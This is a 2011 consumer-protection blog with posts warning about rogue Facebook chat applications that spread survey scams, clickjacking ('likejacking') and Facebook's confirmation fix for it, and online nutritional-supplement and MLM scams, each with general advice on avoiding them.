Search This Blog

Wednesday, 23 March 2011

Facebook Facing Wave of Facebook Chat Attacks

The popular social networking site Facebook, which is always finding itself the target for many scammers and hoaxers has been facing a surge of attacks recently targeted at its Instant chat feature that comes integrated within the website.

Facebook users have been complaining about malicious links that are circulating automatically throughout the Chat facility that direct unwitting users to application installation pages. Such Facebook applications are typically survey scams where victims are told to complete surveys, which when completed make money for the scammers.

The surge of attacks using the Chat facility has led to many people leaving the blame on “self-generating viruses” (see here for our article on that warning), worms and Koobface threats, when in reality the blame is on the rogue self-propagating Facebook applications.
The links that are circulating through Chat are bundled with some curious message that is designed to bait victims into clicking the link. Once clicked, users are taken to a page like the one below.



As you can see from the permissions page on this application installation page, the Facebook application wants access to your Facebook Chat facility. It needs this so it can pass the same message that fooled you onto your Facebook contacts.
Additionally once the application installs, users are typically urged to complete a survey to see or receive whatever the original Chat message promised.

The messages circulating throughout chat are different, but some popular ones include –

"OMG: This girl killed herself after her FATHER posted this message on her wall"
(again!)

"It will make you reevaluate what you put on your wall after seeing this"

"hey lol check out this girl,she i cant believe this video"

"omg hahah have u seen this photo u got tagged in LOL"

Other similar derivatives are also used, all of them designed to lure curiosity from the potential victim.
Worth noting is the links bundled with these messages nearly always use the Bit.Ly shortcut method, which hides the true URL address.

Facebook does its best to delete such applications and usually does so within hours of them popping up, meaning many of these messages end up pointing to dead links where the application used to be, but the open nature of Facebooks application development platform means that new rogue applications are literally popping up everyday.

Always be wary of links sent to you through wall postings, comments or through Facebook chat, especially if that link and message seems suspicious or out of character with the sender, or if the link is disguised with a URL shortener such as Bit.Ly. Never install Facebook applications that appear after clicking on such links, and if you have, you should visit this page that contains instructions on how to remove rogue Facebook applications.

Monday, 21 March 2011

Facebook Fight Back Against Likejacking Scams

Last week our blog post was about clickjacking (also dubbed likejacking scams) so we won’t go into much detail about how the scams to say, other than to say it is the recently prolific scam of hiding Facebook Like buttons underneath images in a bid to trick online viewers into clicking and inadvertently liking external pages.

However Facebook has actually stopped such scams in their tracks by replacing their one-click Like button with a new version that requires users to confirm their “Like” before the action is posted on the Facebook users newsfeed.

The update, which has already been implemented, prevents the one-click nature of the Like button by replacing it with a three step process. Firstly an Internet user clicks the Like button displayed on a website, and the word Confirm appears. Upon clicking Confirm a pop-up appears giving information about the webpage the user is about to Like. The user then has the opportunity to confirm the “Like” action, or cancel it altogether.

Of course this means Facebook clickjacking scams, which rely on a user inadvertently clicking a Like button and hence “liking “ a page, become almost impossible since users will have to confirm a pop-up to complete the “liking” process, giving potential victims a chance to cancel the action once they realise they have been duped.

Whilst clickjacking is a broader term that is not specific to Facebook, this action may mean we have seen the last of Facebook clickjacking (likejacking) scams.

The move is also going to give Facebook some rare positive feedback from privacy and security experts, amidst all the current controversy the social networking giant is facing, specifically the imminent move to begin sharing the contact details of Facebook users with third party Facebook application developers.

Monday, 14 March 2011

Facebook Clickjacking Attacks

In a nutshell…

Clickjacking, in its most broadest sense, is a type of attack that involves hiding certain functions within a webpage that activate when a victim clicks on them – the victim is under the impression that their clicking action will perform a completely different function, unaware that the hidden script is present and has the ability to perform a completely unwanted action.

Facebook clickjacking attacks are one of the most prevalent, and are most commonly designed to get Facebook users to unwittingly "like" external websites which in turn spreads such websites to that Facebook users contact list.

Facebook clickjacking attacks are also dubbed "likejacking" since it utilises the "like" feature on Facebook.

How it works…

For anyone familiar with Facebook and how it operates, they will also be familiar with the ability to "Like" information such as comments, videos and status updates. When a Facebook "likes" something, it appears on their Facebook Wall that they "liked" it, which in turn will appear in the newsfeed of many of their contacts.
A recent addition to the "Like" feature is that website developers can add a button to their own websites that allow Facebook users to "Like" the website by clicking that button, meaning Facebook users do not have to be within the Facebook environment to use this feature.

This has led to scammers essentially hiding the Facebook "Like" button on their websites and then tricking users to clicking on the area of the webpage that contains the hidden button, so what essentially happens is that the user inadvertently “likes” a website by clicking on an area of a webpage. The user is unaware that they have "liked" a webpage and that this action has been published on their Facebook Wall and on the newsfeed of many of their contacts.

The clickjacking is designed to bait people into "liking" a page so that a page can propagate between Facebook users since Facebook contacts who have seen that their Facebook “friend” has “liked” a page are likely to visit the same page and fall for the same trap.

Popular Examples

The most prolific example of a clickjacking attack is where Facebook users are baited with a non-existent video. They are taken to a page which replicates a typical video sharing site. Users are clearly baited to click the Play icon in the middle of the video screen, and this is where the hidden Facebook "Like" button will be located. Clicking the Play button will cause the user to “like” the webpage.

Some sites try and replicate YouTube. Some use a logo displaying TouTube, FouTube or FBTube.

Other popular examples include requesting users to "prove their human" by clicking certain areas of a webpage in a certain order. The Facebook "Like" button is simply hidden in one of these areas.
Survey Scams

2011 has seen a significant increase in clickjacking attacks that are employed to help survey scammers. Facebook survey scams have previously used various tactics to help spread including rogue Facebook applications, forcing a user to "like" and "share" an external website or forcing them to join a Facebook group. Clickjacking is the latest tactic survey scammers are using to help them spread their malicious links.

Survey scams are when scammers trick victims into completing surveys on the false assertion the victim will receive/achieve something in return. Once a victim completes a survey, the scammer gets money. More information on Facebook survey scams can be seen
here.

Victim?

If you are the victim of a clickjacking attack, the first thing you need to do is remove the offending “like” post that your Facebook account has just produced. Go to your profile and hover over the post. Click the "x" on the top right and then click Remove. This will stop your Facebook contacts from falling in the same trap.

For most clickjacking accounts on Facebook, this is all you need to do, since many clickjacking accounts do not involve any malicious payload.

If you feel you may have downloaded something onto your computer through the attack, run an up-to-date virus scam to check for threats.

Avoiding Clickjacking Attacks

The easiest way to avoid such attacks is to be careful on what links you click on Facebook and to always be wary of suspicious links and websites. If a link is offering you something that you think does not exist or is too good to be true, then it probably is.

There are other more dynamic ways to avoid clickjacking accounts as well, such as downloading and using the Firefox web browser to visit websites. Firefox has an optional downloadable NoScript plugin with disables any type of hidden script which can be utilised by clickjacking scammers. This plugin can be used to disable all types of embedded script on sites that you do not trust.

Additionally, always make sure you use the most recent version of your Internet browser (i.e. Internet Explorer, Firefox, Opera, Chrome)

Tuesday, 1 March 2011

Nutritional/Dietary Supplement Scams

A quick guide to buying nutritional supplements online, and why users should always be wary when purchasing self improvement supplements online


The age of medicine is always quickly changing, and one of the main talking points regarding health and fitness over the past years is the use of nutritional supplements. With the peoples dream of living for as long as possible, nurturing a healthy diet and otherwise natural healthy lifestyle is no longer considered sufficient with the introduction and increasing popularity of additional supplements one may not otherwise take.

The subject of nutritional supplements is one that still draws considerable controversy, both from the medical and retail communities, yet it seems that dietary enhancements are becoming more popular and increasingly accepted in today's world.

However, like anything that draws controversy and increases in popularity, there are people out there who take advantage of the situation.

Beware of the Acai Berries!

One such popular supplement is commonly known as the Acai Berry which is notoriously sold online as a dietary enhancement that purports to improve health, sexual virility and help with weight loss. However there is no credible evidence to back up these claims and many websites and multi level marketing plans selling Acai Berry based products have been shown to be both misleading and fraudulent. There are a significant number of complaints regarding these Acai schemes that vary from over charging credit cards, consumers getting unwittingly involved with
Ponzi schemes and poor products or placebos being sent to customers. These attributes have in many cases become synonymous in the online self-improvement scam industry, with a surge of thousands of sites purporting to sell "miracle dietary cures", only for the victim to find out that the claims made by the websites were simply false or misleading, both grossly exaggerating the benefits of using the product and the downfalls of not using it.

Such sites selling supplements like these would be known to use many other misleading tactics, such as using trademarked logos of legitimate news outlets and magazines in an attempt to feign endorsement. Additionally scam sites would hide expensive monthly charges under the facade of a "free trial" and automatically sign up victims to multiple subscriptions making it harder for victims to cancel and avoid further charges.

This has led to many supplement based websites also being attacked and shut down for breach of many non-supplement FTC guidelines, including updated FTC guidelines regarding the use of both customer testimonials and celebrity endorsements. Such sites would use faked unverifiable customer testimonials that purported atypical and uncharacteristic results, and also employed fake celebrity endorsements. Celebrities such as Oprah Winfrey and her resident medical expert Dr. Oz were notoriously unwittingly linked to these scams, which led to them filing suit against a number of these sites. Such sites claimed the celebrity duo endorsed their products, which was untrue.

You can read more about
Acai Berry Scams on our site here.

MLMs and Pyramid Schemes

Additionally websites or multi level marketing plans that sell a wider range of supplements have also attracted noteworthy criticism, on many fronts, which has led to specific FTC guidelines outlining the retail and advertisements of such supplements sold by sites and MLMs in the USA.
One such controversy that has drawn fierce criticism is often poor advice given by sites and affiliates regarding the sales of such items in order to sell supplements, which is often prioritised over giving sound advice to potential customers. One drawback, especially concerning MLMs that sell supplements, is the innate nature of an MLM structure that pressures its affiliates into selling as many of these supplements as possible with little regard to whether the end user really requires such a product.
Such affiliate based selling techniques are also often criticised for not checking their affiliates knowledge or experience of nutritional supplements when providing advice and selling such commodities. There is little legal ground or legislation concerning this area since these supplements are not considered [prescription] drugs, even though poor advice regarding supplements can still be considered potentially dangerous.

Even larger MLMs like USANA and Vitamark that focus on the sales of nutritional supplements have drawn their share of criticism and disapproval. USANA had found themselves in court for misleading their affiliates regarding potential earnings, a popular trademark of shady MLM schemes. The legal MLM Pre Paid Legal found themselves in trouble with the SEC for similar reasons.

Nutritional advice, like medical advice, is always best coming from someone who is qualified in the field. Whilst in many cases websites or affiliates of MLMs that sell supplements might be knowledgeable in the area, there is no guarantee, and any advice is likely to be biased to selling their products.

Our recommendation is always to get advice from either your doctor or a qualified nutritionist, and if you do purchase such products online, proceed with caution and remember that the person selling you the item is just that – a salesman, not a qualified nutritionist and any advice offered should not necessarily be taken as correct.